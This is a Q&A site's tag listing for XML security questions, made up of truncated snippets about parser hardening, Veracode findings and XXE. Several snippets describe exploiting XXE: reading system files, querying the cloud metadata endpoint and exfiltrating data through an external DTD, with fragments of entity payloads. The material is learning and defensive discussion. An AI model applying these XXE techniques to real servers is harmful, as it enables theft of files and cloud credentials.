close
Skip to main content
Information Security

Questions tagged [xml]

Ask Question

XML (Extensible Markup Language) is a set of rules for encoding documents in both human-readable and machine-readable form. Use this tag for security issues relating to the format itself, or where the fact that the data is xml-formatted is core to the question.

78 questions
Newest Active Bountied Unanswered
Filter by
Sorted by
Tagged with
-2 votes
1 answer
204 views

I want to write down as a security requirements, the recommended security configurations that should be applied to any xml parser. I checked the OWASP cheatsheet (https://cheatsheetseries.owasp.org/...
anonymous's user avatar
  • 559
1 vote
0 answers
477 views

Currently, I've discovered an OOB XXE that allows me to include a .dtd file to extract a particular system file content, for instance, /sys/power/disk. So my file.dtd is: <!ENTITY % data SYSTEM &...
nicg's user avatar
  • 11
1 vote
0 answers
560 views

I was able to extract a line from the /etc/hostname file and also http://169.254.169.254/latest/meta-data/local-hostname but I want to extract the content of files with multiple line, such as the aws ...
ELMO's user avatar
  • 111
1 vote
2 answers
1k views

If I am already using xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); then do I also need to use xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities",...
Rupesh Pal's user avatar
  • 11
0 votes
2 answers
1k views

There's a web application on a server which I have full access to which accepts POST requests on a REST endpoint. The request payload is expected to be an XML document. For request routing and load ...
G_H's user avatar
  • 121
1 vote
2 answers
700 views

I keep hearing about the XML round trip vulnerability in version 3.2.4 of the Ruby package REXML. I looked into it myself, of course, and it seems to have something to do with parsing an XML document, ...
Alex V's user avatar
  • 200
1 vote
1 answer
1k views

My lab Kali Linux:192.168.171.134 bWApp Server: http://192.168.171.131 I want to do an exfiltration data via HTTP on this Blind XXE. I'll use the Portswigger Payload. This is the External.DTD: &...
Zefiro38's user avatar
  • 21
1 vote
1 answer
1k views

SCENARIO: I successfully tried to send a request to the burp collaborator, then the application is vulnerable to SSRF through blind XXE. The payload I used is the following <?xml version="1.0&...
Maicake's user avatar
  • 597
0 votes
2 answers
1k views

My goal is to create a docx file that, when uploaded to a server and parsed there, causes the parser to fetch my url so I know it worked. Unfortunately, I only have Libre Office and not MS Office at ...
Sorokine's user avatar
  • 1
0 votes
1 answer
278 views

What i want to do is access the Content-type header which is placed under the Access-Control-Allow-Headers header as i want to attempt to change json to xml on a web application im working on to check ...
sheppard's user avatar
  • 59
2 votes
1 answer
657 views

If you Google for an example of XXE injection you get something like this: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe ...
XCore's user avatar
  • 234
4 votes
1 answer
511 views

I've been studying XXE attacks through Portswigger's Web Security Academy. I stumbled upon a lab Exploiting blind XXE to exfiltrate data using a malicious external DTD. In this lab an attacker has to ...
Shuzheng's user avatar
  • 1,317
1 vote
1 answer
2k views

We have a legacy application on spring mvc and we have a web service exposed (SOAP protocol) for some reporting client app. This service was tested by a security team and the report indicates that the ...
Suhas Karanth's user avatar
  • 11
1 vote
0 answers
315 views

Veracode reports that the below code is susceptible to CWE-611: Improper Restriction of XML External Entity Reference. XslCompiledTransform transform = new XslCompiledTransform(); transform.Load(...
Hoppe's user avatar
  • 143
0 votes
1 answer
780 views

I'm modifying an ASPNET MVC 5 web site and a requirement is to allow users to upload an XML and PDF file. The XML file will be used to layout text on the PDF based on variables coming from within the ...
bernieslearnings's user avatar
  • 101

15 30 50 per page
1
2 3 4 5 6